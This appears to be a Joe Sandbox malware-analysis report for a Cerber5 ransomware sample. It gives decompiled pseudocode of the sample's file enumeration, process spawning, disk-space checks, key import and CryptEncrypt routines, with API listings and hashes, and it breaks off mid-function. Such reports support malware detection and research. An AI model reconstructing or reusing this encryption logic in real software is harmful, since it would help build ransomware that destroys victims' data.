                                                                                                                                                                                        								_t73 = _t73 + 0x1c;
                                                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                                                        								if(_t44 != 0) {
                                                                                                                                                                                        									_push( &(_v612.cFileName));
                                                                                                                                                                                        									_push(E0040591C(0x40cedc, 0xd, 0x674a9bfe));
                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                        									E00402B9B(_t63, _t69, _t70, _t71);
                                                                                                                                                                                        									_push( &_v20);
                                                                                                                                                                                        									_t49 = 0xb;
                                                                                                                                                                                        									E00405DFA(_t49, _t65, _t69);
                                                                                                                                                                                        									_pop(_t65);
                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                        									_push( &_v20);
                                                                                                                                                                                        									_push(E00405905(0x40ceec, 0x3d, 0xa229e8b6));
                                                                                                                                                                                        									_push( &_v8);
                                                                                                                                                                                        									_t54 = E00405B59(_t63, _t65, _t70, _t71, __eflags);
                                                                                                                                                                                        									_t73 = _t73 + 0x34;
                                                                                                                                                                                        									__eflags = _t54;
                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                        										E0040137F(_t63, _t65, _t70, __eflags, _v8);
                                                                                                                                                                                        										_pop(_t65);
                                                                                                                                                                                        										E00405463(_v8);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t71 = _a8;
                                                                                                                                                                                        									E00405463(_a8);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t60 = E00406390( &(_v612.cFileName),  &_v1652, _t70);
                                                                                                                                                                                        							_pop(_t65);
                                                                                                                                                                                        							if(_t60 != 0) {
                                                                                                                                                                                        								E00401423(_t69, _a4,  &_v1652);
                                                                                                                                                                                        								_pop(_t65);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t32 = FindNextFileW(_t63,  &_v612);
                                                                                                                                                                                        				} while (_t32 != 0);
                                                                                                                                                                                        				goto L14;
                                                                                                                                                                                        			}

























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlenW.KERNEL32(00401636,0040183A,00000000,00000000), ref: 00401433
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00401472
                                                                                                                                                                                        • PathMatchSpecW.SHLWAPI(?,00000000), ref: 004014EE
                                                                                                                                                                                          • Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
                                                                                                                                                                                          • Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
                                                                                                                                                                                          • Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
                                                                                                                                                                                          • Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004015A8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseErrorFileFindHandleLastProcess$CreateFirstFreeHeapMatchNextObjectPathSingleSpecTerminateWaitlstrlenmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3597093630-0
                                                                                                                                                                                        • Opcode ID: 5d56be7d600ee7cc226b40cadb0352b37b8e8447c406b97f4544eebc66979ee5
                                                                                                                                                                                        • Instruction ID: 3cbd6c154ce3158a442487cf6f0ac316fb6bcfd1db9ef5865afd0173552f36fe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d56be7d600ee7cc226b40cadb0352b37b8e8447c406b97f4544eebc66979ee5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D418372800119BADB20AB61DC46FAB336CEF40314F5405BBF905F61D1F739AB448AA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 29%
                                                                                                                                                                                        			E0040AAFB(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                                        				union _ULARGE_INTEGER _v12;
                                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                                        				union _ULARGE_INTEGER _v20;
                                                                                                                                                                                        				void* _v220;
                                                                                                                                                                                        				void* _v420;
                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                                                        				_v12.LowPart = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_v20.LowPart = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t30 = GetDiskFreeSpaceExW(_a8, 0,  &_v12,  &_v20); // executed
                                                                                                                                                                                        				if(_t30 != 0 && E00402C54(_t51, _a4) != 0) {
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					StrFormatByteSizeW(_v12.LowPart, _v8,  &_v620);
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					StrFormatByteSizeW(_v20.LowPart, _v16,  &_v420);
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					asm("sbb ecx, [ebp-0xc]");
                                                                                                                                                                                        					StrFormatByteSizeW(_v12.LowPart - _v20.LowPart, _v8,  &_v220);
                                                                                                                                                                                        					_push( &_v220);
                                                                                                                                                                                        					_push( &_v420);
                                                                                                                                                                                        					_push( &_v620);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d920, 0x21, 0x44c051f2));
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					E00402B9B(__ebx, _t51,  &_v16, __esi);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				asm("sbb edx, [ebp-0xc]");
                                                                                                                                                                                        				return _v12 - _v20;
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040AB23
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(00000000,00000000,?,00000064), ref: 0040AB4D
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB62
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB7F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteFormatSize$DiskFreeSpace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 648141005-0
                                                                                                                                                                                        • Opcode ID: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
                                                                                                                                                                                        • Instruction ID: ed8ce472527b587452f6a98b297226058bf91ab61d3eb22b8839db4c947b5189
                                                                                                                                                                                        • Opcode Fuzzy Hash: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
                                                                                                                                                                                        • Instruction Fuzzy Hash: D021E576900119BFDF01DF94DD45EEEBB7ABB08300F0049AAB615B6190DB71AA588B51
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AD62: CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1643522540-0
                                                                                                                                                                                        • Opcode ID: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
                                                                                                                                                                                        • Instruction ID: e707437ec58a6c757e266905c9f68223cccbec67ed6f77b66ad84f0330a91ceb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 41014671600308BFEF218FA1DD8AA9E7B7EEF04341F008035B901A19A0D7718E64AA24
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E00404B6E(BYTE* __edi, char _a4) {
                                                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                        				BYTE* _t8;
                                                                                                                                                                                        				long* _t9;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t8 = __edi;
                                                                                                                                                                                        				_t9 = 0;
                                                                                                                                                                                        				_t10 =  *0x42f804 - _t9; // 0x179e438
                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                        					_t7 =  *0x40fa58(0x42f804, 0, 0, 1, 0xf0000040); // executed
                                                                                                                                                                                        					if(_t7 == 0) {
                                                                                                                                                                                        						 *0x42f804 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t1 =  &_a4; // 0x404464
                                                                                                                                                                                        				_t5 = CryptGenRandom( *0x42f804,  *_t1, _t8);
                                                                                                                                                                                        				if(_t5 != 0 || _v4 <= _t9) {
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					return _t5;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t5 = E004063E1(0xff);
                                                                                                                                                                                        						 *(_t9 + _t8) = _t5;
                                                                                                                                                                                        						_t9 = _t9 + 1;
                                                                                                                                                                                        					} while (_t9 < _v4);
                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042F804,00000000,00000000,00000001,F0000040,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007), ref: 00404B87
                                                                                                                                                                                        • CryptGenRandom.ADVAPI32(dD@ ,80C426C8,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007,?,0040B4AF,00000000), ref: 00404BA2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$AcquireContextRandom
                                                                                                                                                                                        • String ID: dD@
                                                                                                                                                                                        • API String ID: 2163786899-696579481
                                                                                                                                                                                        • Opcode ID: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
                                                                                                                                                                                        • Instruction ID: e2ef947ef44517b9588ee9796fddc0016603c5d158485c66fdcfa932e0cbdc38
                                                                                                                                                                                        • Opcode Fuzzy Hash: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F08270640261AADB316B119E44F5BBFB4AB80B40F80443EBA4861590C238E885C7AD
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E0040AFFE(void* __eax, int __edi, intOrPtr _a4, void* _a8, void* _a12) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long* _t13;
                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                        				long* _t28;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t25 = __edi;
                                                                                                                                                                                        				_t21 = 0; // executed
                                                                                                                                                                                        				_t13 = E0040AF8D(__eax, _a4); // executed
                                                                                                                                                                                        				_t28 = _t13;
                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                        					if(_a12 != 0) {
                                                                                                                                                                                        						memcpy(_a12, _a8, __edi);
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_a12 = _a8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v8 = _t25;
                                                                                                                                                                                        					_t21 = _t21 & 0xffffff00 |  *0x40fa50(_t28, _t21, 1, _t21, _a12,  &_v8, _t25) != 0x00000000;
                                                                                                                                                                                        					CryptDestroyKey(_t28);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t21;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
                                                                                                                                                                                          • Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2
                                                                                                                                                                                        • memcpy.NTDLL(?,?,0001A2AC,00000000,?,?,?,0040B07B,?,?,00000000,00000000,00000000,0040128F,0040FDC0,0040FDD4), ref: 0040B02B
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0001A2AC,?,0001A2AC,?,?,?,?,00000000,000000C8), ref: 0040B043
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000,?,?,?,?,00000000,000000C8), ref: 0040B04F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 774555595-0
                                                                                                                                                                                        • Opcode ID: eed7bca699b7271e2f8133fceda6d266f3483274d5b1aca3eb140505197ca46d
                                                                                                                                                                                        • Instruction ID: c796a56940c9369ceff2896823de790180829fd366095f41db376a1457016cc5
                                                                                                                                                                                        • Opcode Fuzzy Hash: eed7bca699b7271e2f8133fceda6d266f3483274d5b1aca3eb140505197ca46d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F06276500259BFDF20AF619C85CDF3BACEF45754B00453AFD21A6250D3758E14DAA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E0040AF8D(int __esi, void* _a4) {
                                                                                                                                                                                        				long* _v8;
                                                                                                                                                                                        				void _v24;
                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                        				void _v35;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				char* _t23;
                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				if(E0040AF69() != 0) {
                                                                                                                                                                                        					_t24 = 6;
                                                                                                                                                                                        					memset( &_v35, 0, _t24 << 2);
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					asm("stosb");
                                                                                                                                                                                        					_v36 = 0x208;
                                                                                                                                                                                        					_v32 = 0x6801;
                                                                                                                                                                                        					_v28 = __esi;
                                                                                                                                                                                        					memcpy( &_v24, _a4, __esi);
                                                                                                                                                                                        					CryptImportKey( *0x42faf4,  &_v36, 0x1c, 0, 0,  &_v8); // executed
                                                                                                                                                                                        					_t26 = __esi;
                                                                                                                                                                                        					_t23 =  &_v24;
                                                                                                                                                                                        					if(__esi != 0) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							 *_t23 = 0;
                                                                                                                                                                                        							_t23 = _t23 + 1;
                                                                                                                                                                                        							_t26 = _t26 - 1;
                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AF69: CryptAcquireContextW.ADVAPI32(0042FAF4,00000000,00000000,00000001,F0000000,0040AF9C), ref: 0040AF81
                                                                                                                                                                                        • memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$AcquireContextImportmemcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 765176249-0
                                                                                                                                                                                        • Opcode ID: 46ecc010d97fa25e3c5be6b2cb8034e01b895c56157c12cbe359982bfb4b8a12
                                                                                                                                                                                        • Instruction ID: 3a753eb2b7e9b1c05a6a89d0856bf63f6f9c9ee9a6ed8b67e501f67ceec9ed79
                                                                                                                                                                                        • Opcode Fuzzy Hash: 46ecc010d97fa25e3c5be6b2cb8034e01b895c56157c12cbe359982bfb4b8a12
                                                                                                                                                                                        • Instruction Fuzzy Hash: A4018471A0020AAAEF10DB94DD45FEF77B8EF44704F100035E900B61D0D7B49A199B95
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                        			E004027DD(void* __ecx, signed int __edx, void* __eflags, char _a4) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				long* _t28;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                        				signed short _t42;
                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				signed char _t84;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                        				signed short _t92;
                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                        				long* _t105;
                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                        				void* _t121;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t102 = __edx;
                                                                                                                                                                                        				_t22 = E0040B53E(__ecx); // executed
                                                                                                                                                                                        				_t125 = _t22;
                                                                                                                                                                                        				if(_t22 == 0) {
                                                                                                                                                                                        					return _t22;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t104 =  &E0040D17C;
                                                                                                                                                                                        				_t23 = E00405905( &E0040D17C, 7, 0x80c426c8);
                                                                                                                                                                                        				_t114 = _t113 + 0xc;
                                                                                                                                                                                        				_t83 = E004031AF(_a4, _t125, _t23);
                                                                                                                                                                                        				_t126 = _t83;
                                                                                                                                                                                        				if(_t83 == 0) {
                                                                                                                                                                                        					_t84 = _v16;
                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t47 = E00405905( &E0040D17C, 7, 0x80c426c8);
                                                                                                                                                                                        					_t118 = _t114 + 0xc;
                                                                                                                                                                                        					_t50 = E00403253(E004031AF(_t83, _t126, _t47), _t126);
                                                                                                                                                                                        					_t127 = _t50 | _t102;
                                                                                                                                                                                        					 *0x42f79e = 1;
                                                                                                                                                                                        					if((_t50 | _t102) == 0) {
                                                                                                                                                                                        						 *0x42f79e = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t52 = E00405905(0x40d184, 0xb, 0xd51d715e);
                                                                                                                                                                                        					_t119 = _t118 + 0xc;
                                                                                                                                                                                        					_t55 = E00403253(E004031AF(_t83, _t127, _t52), _t127);
                                                                                                                                                                                        					_t128 = _t55 | _t102;
                                                                                                                                                                                        					if((_t55 | _t102) == 0) {
                                                                                                                                                                                        						 *0x42f79c = 0;
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						_t57 = E00405905(0x40d1a4, 0xe, 0xc05954db);
                                                                                                                                                                                        						_t120 = _t119 + 0xc;
                                                                                                                                                                                        						_t60 = E00403253(E004031AF(_t83, _t130, _t57), _t130);
                                                                                                                                                                                        						_t131 = _t60;
                                                                                                                                                                                        						if(_t60 == 0) {
                                                                                                                                                                                        							_t60 = 0x80;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *0x42f7b8 = _t60 << 0x14;
                                                                                                                                                                                        						_t62 = E00405905(0x40d1b4, 7, 0x4d2b3d31);
                                                                                                                                                                                        						_t121 = _t120 + 0xc;
                                                                                                                                                                                        						_t65 = E00403253(E004031AF(_t83, _t131, _t62), _t131);
                                                                                                                                                                                        						 *0x42f7d8 = _t65;
                                                                                                                                                                                        						_t132 = _t65;
                                                                                                                                                                                        						if(_t65 == 0) {
                                                                                                                                                                                        							 *0x42f7d8 = 0x20000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *0x42f7c0 = E00403253(E004031AF(_t83, _t132, E00405905(0x40d1bc, 0xa, 0xe7b760df)), _t132);
                                                                                                                                                                                        						 *0x42f7c4 = _t102;
                                                                                                                                                                                        						 *0x42f7a8 = E00403253(E004031AF(_t83, _t132, E00405905(0x40d1c8, 0xd, 0x2e896a3a)), _t132);
                                                                                                                                                                                        						 *0x42f7ac = _t102;
                                                                                                                                                                                        						_t74 = E00405905(0x40d1d8, 0xc, 0xedfce971);
                                                                                                                                                                                        						_t114 = _t121 + 0x24;
                                                                                                                                                                                        						_t104 = E004031AF(_t83, _t132, _t74);
                                                                                                                                                                                        						_t84 =  <  ? 0x240 : E00403253(_t76, _t132);
                                                                                                                                                                                        						while((_t84 & 0x00000007) != 0) {
                                                                                                                                                                                        							_t84 = _t84 + 1;
                                                                                                                                                                                        							__eflags = _t84;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L18:
                                                                                                                                                                                        						_v5 = 0;
                                                                                                                                                                                        						_t26 = E004026FE(_t104); // executed
                                                                                                                                                                                        						if(_t26 != 0) {
                                                                                                                                                                                        							 *0x42f79d = 1;
                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t28 = E0040B17E(_a4); // executed
                                                                                                                                                                                        							_t105 = _t28;
                                                                                                                                                                                        							_pop(_t88);
                                                                                                                                                                                        							_t136 = _t105;
                                                                                                                                                                                        							if(_t105 != 0) {
                                                                                                                                                                                        								_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        								_t31 = E0040B472(_t88, _t136, _t84,  &_v12,  &_v16); // executed
                                                                                                                                                                                        								_t137 = _t31;
                                                                                                                                                                                        								if(_t31 != 0) {
                                                                                                                                                                                        									 *0x42f7a0 = _v16;
                                                                                                                                                                                        									_t34 = E0040B283(_t88, _t137, _t105, _v12, 0x42f7a0);
                                                                                                                                                                                        									 *0x42f7b0 = _t34;
                                                                                                                                                                                        									if(_t34 != 0) {
                                                                                                                                                                                        										_t37 = E0040B253(_t88,  *0x43000c,  *0x430004);
                                                                                                                                                                                        										_pop(_t90);
                                                                                                                                                                                        										 *0x42f7bc = _t37;
                                                                                                                                                                                        										if(_t37 != 0) {
                                                                                                                                                                                        											_t40 = E0040B146(_t90, _t37) - 0x0000000b & 0x0000ffff;
                                                                                                                                                                                        											_t92 = _t40 - 0x17;
                                                                                                                                                                                        											if(_t92 >= 0x10) {
                                                                                                                                                                                        												_t92 = 0x10;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											 *0x42f7a4 = _t92;
                                                                                                                                                                                        											_t93 = _t92 & 0x0000ffff;
                                                                                                                                                                                        											_t42 = _t40 -  *0x42f7a4 - 0x17;
                                                                                                                                                                                        											 *0x42f7b4 = _t42;
                                                                                                                                                                                        											 *0x42f794 = (_t42 & 0x0000ffff) + (_t92 & 0x0000ffff) + 0x17;
                                                                                                                                                                                        											_t45 = E00401209();
                                                                                                                                                                                        											 *0x430008 = _t45;
                                                                                                                                                                                        											if(_t45 != 0) {
                                                                                                                                                                                        												E0040AD86(_t93, _t45,  *0x430000, 0x42f7c8);
